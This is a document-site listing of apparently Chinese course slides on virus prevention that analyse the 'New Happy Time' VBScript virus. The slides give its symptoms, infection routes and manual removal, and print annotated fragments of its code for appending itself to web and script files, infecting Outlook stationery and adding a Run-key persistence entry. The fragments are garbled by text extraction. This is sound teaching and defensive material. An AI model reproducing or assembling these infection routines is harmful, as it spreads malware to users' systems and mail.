收藏
下载资源

计算机病毒与防治5-4“欢乐时光”病毒实例

上传人:x**** 文档编号:125472511 上传时间:2020-03-17 格式:PPT 页数:35 大小:498.50KB
返回 下载 相关 举报
计算机病毒与防治5-4“欢乐时光”病毒实例_第1页
第1页 / 共35页
计算机病毒与防治5-4“欢乐时光”病毒实例_第2页
第2页 / 共35页
计算机病毒与防治5-4“欢乐时光”病毒实例_第3页
第3页 / 共35页
计算机病毒与防治5-4“欢乐时光”病毒实例_第4页
第4页 / 共35页
计算机病毒与防治5-4“欢乐时光”病毒实例_第5页
第5页 / 共35页
点击查看更多>>
资源描述

《计算机病毒与防治5-4“欢乐时光”病毒实例》由会员分享,可在线阅读,更多相关《计算机病毒与防治5-4“欢乐时光”病毒实例(35页珍藏版)》请在金锄头文库上搜索。

1、Virus 计算机病毒与防治计算机病毒与防治 计算机病毒与防治课程小组 5 4网页脚本病毒防治 欢乐时光病毒的特点及代码分析 5 4典型网页病毒剖析 计算机病毒与防治课程小组 欢乐时光病毒的手工清除 新欢乐时光病毒特点 病毒名称 新欢乐时光 病毒类型 网页脚本病毒 危险级别 影响系统 Win 9X ME NT 2000 英文名包括有 HTML Redlof A Symantec VBS Redlof AVP VBS REDLOF A Trend VBS Redlof A Sophos VBS KJ 金山 Script RedLof 瑞星 VBS KJ 江民 计算机病毒与防治课程小组 新欢乐时光

2、病毒特点 新欢乐时光病毒特点 新欢乐时光病毒是一个多变形 加密病毒 感染扩展名为 html htm asp php jsp htt和 vbs文件 同时该病毒会大量生成folder htt 和desktop ini 并在 windir System中生成一个名字叫Kernel dll Windows 9x Me 或kernel32 dll Windows NT 2000 的文件 修改 dll 文件的打开方式 感染Outlook的信纸文件 感染这个病毒后有两个明显的特征 a 在每个目录中都会生成folder htt 带毒文件 和desktop ini 目录 配置文件 b 电脑运行速度明显变慢 在任

3、务列表中可以看到有大量的Wscript exe 程序在运行 计算机病毒与防治课程小组 新欢乐时光病毒特点 新欢乐时光病毒 这个网页病毒利用微软IE的漏洞 通过感染一些 html htm asp php jsp htt和 vbs等文件进行传播 然而由于病毒的本身特性 其传播的途径也有多种 a 通过网页传播 由于病毒会感染网页文件 如果那些网站站长不小心将带毒的 网页放到网站上 用户不小心浏览了这些网页就会被病毒感染了 b 通过局域网 当本地计算机设有可写权限的共享目录 或者访问局域网上带毒 的计算机的时候就会感染病毒 对于Windows NT 2000系统 由于存在默认的管理用 共享目录 因此

4、管理员的疏忽也可能会造成感染 c 通过电子邮件 如果发件人使用了带毒的网页文件作为信纸 或者信件中有带 毒的网页文件 那么 只要收件人浏览了邮件 也会被感染病毒 d 通过移动介质 如软盘 移动硬盘 光盘等 由于病毒会生成folder htt和 desktop ini 所以在打开移动介质或打开其文件夹的时候 就会激活并感染病毒 计算机病毒与防治课程小组 新欢乐时光代码分析 Dim InWhere HtmlText VbsText DegreeSign AppleObject FSO WsShell WinPath SubE F inalyDisk Sub KJ start 初始化变量 KJSet

5、Dim 初始化环境 KJCreateMilieu 感染本地或者共享上与html所在目录 KJLikeIt 通过vbs感染Outlook邮件模板 KJCreateMail 进行病毒传播 KJPropagate End Sub 计算机病毒与防治课程小组 新欢乐时光病毒主运行程序代码 新欢乐时光代码分析 Function KJAppendTo On Error Resume Next 以只读方式打开指定文件 Set ReadTemp FSO OpenText 将文件内容读入到TmpStr变量中 TmpStr ReadTemp ReadAll 判断文件中是否存在 KJ start 字符串 若存在说明已

6、经感染 退出函数 若文件长 度小于1 也退出函数 If Instr TmpStr KJ start 0 Or Len TmpStr 1 Then ReadTemp Close Exit Function End If 如果传过来的类型是 htt 在文件头加上调用页面的时候加载KJ start 函数 在文 件尾追加html版本的加密病毒体 如果是 html 在文件尾追加调用页面的时候加载 KJ start 函数和html版本的病毒体 如果是 vbs 在文件尾追加vbs版本的病毒体 If TypeStr htt Then ReadTemp Close Set FSO OpenText vbCrLf

7、 TmpStr vbCrLf HtmlText 函数功能 向指定类型的指定文件追加病毒 计算机病毒与防治课程小组 Set FAttrib FSO Get FAttrib attributes 34 Else ReadTemp Close Set FSO OpenText If TypeStr html Then vbCrLf vbCrLf vbCrLf HtmlText ElseIf TypeStr vbs Then vbCrLf VbsText End If End If End Function 新欢乐时光代码分析 计算机病毒与防治课程小组 新欢乐时光代码分析 计算机病毒与防治课程小组 函

8、数功能 改变子目录以及盘符 Function KJChangeSub CurrentString LastIndexChar 判断是否是根目录 If LastIndexChar 0 Then 如果是根目录 如果是C 返回FinalyDisk盘 并将SubE置为0 如果不是C 返回将当前盘符递减1 并将SubE置为0 If Left LCase CurrentString 1 LCase c Then KJChangeSub FinalyDisk SubE 0 Else KJChangeSub Chr Asc Left LCase CurrentString 1 1 SubE 0 End If

9、Else 如果不是根目录 则返回上一级目录名称 KJChangeSub Mid CurrentString 1 LastIndexChar End If End Function 新欢乐时光代码分析 计算机病毒与防治课程小组 Function KJCreateMail On Error Resume Next 如果当前执行文件是 html 的 就退出函数 If InWhere html Then Exit Function End If 取系统盘的空白页的路径 ShareFile Left WinPath 3 Program Files Common Files Microsoft Share

10、d Stationery blank htm 如果存在这个文件 就向其追加病毒体 否则生成含有病毒体的文件 If FSO ShareFile Then Call KJAppendTo ShareFile html Else Set FSO OpenText vbCrLf vbCrLf HtmlText End If 功能 感染邮件部分 新欢乐时光代码分析 计算机病毒与防治课程小组 取得当前用户的ID和OutLook的版本 DefaultId WsShell RegRead HKEY CURRENT USER Identities Default User ID OutLookVersion W

11、sShell RegRead HKEY LOCAL MACHINE Software Microsoft Outlook Express MediaVer 激活信纸功能 并感染所有信纸 WsShell RegWrite HKEY CURRENT USER Identities DefaultId Software Microsoft Outlook Express Left OutLookVersion 1 0 Mail Compose Use Stationery 1 REG DWORD Call KJMailReg HKEY CURRENT USER Identities DefaultI

12、d Software Microsoft Outlook Express Left OutLookVersion 1 0 Mail Stationery Name ShareFile Call KJMailReg HKEY CURRENT USER Identities DefaultId Software Microsoft Outlook Express Left OutLookVersion 1 0 Mail Wide Stationery Name ShareFile 新欢乐时光代码分析 计算机病毒与防治课程小组 WsShell RegWrite HKEY CURRENT USER S

13、oftware Microsoft Office 9 0 Outlook Options Mail EditorPrefere nce 131072 REG DWORD Call KJMailReg HKEY CURRENT USER Software Microsoft Windows Messaging Subsystem Profiles Microsoft Outlook Internet Settings 0a0d0c0046 001e0360 blank Call KJMailReg HKEY CURRENT USER Software Microsoft Windows NT C

14、urrentVersion Windows Messaging Subsystem Profiles Microsoft Outlook Internet Settings 0a0d0c0046 001e0360 blank WsShell RegWrite HKEY CURRENT USER Software Microsoft Office 10 0 Outlook Options Mail EditorPrefer ence 131072 REG DWORD Call KJMailReg HKEY CURRENT USER Software Microsoft Office 10 0 C

15、ommon MailSettings NewStationery blank KJummageFolder Left WinPath 3 Program Files Common Files Microsoft Shared Stationery End Function 新欢乐时光代码分析 计算机病毒与防治课程小组 Function KJCreateMilieu On Error Resume Next TempPath 判断操作系统是NT 2000还是9X If Not FSO WinPath WScript exe Then TempPath system32 End If 为了文件名起

16、到迷惑性 并且不会与系统文件冲突 如果是NT 2000则启动文件为 system Kernel32 dll 如果是9x启动文件则为system Kernel dll If TempPath system32 Then StartUpFile WinPath SYSTEM Kernel32 dll Else StartUpFile WinPath SYSTEM Kernel dll End If 添加Run值 添加刚才生成的启动文件路径 WsShell RegWrite HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion Run Kernel32 Sta rtUpFile 功能 创建系统环境 新欢乐时光代码分析 计算机病毒与防治课程小组 拷贝前期备份的文件到原来的目录 FSO Copy web kjwall gif WinPath web Folder htt FSO Copy system32 kjwall gif WinPath system32 desktop ini 向 windir web Folder ht

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 医学/心理学 > 综合/其它

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号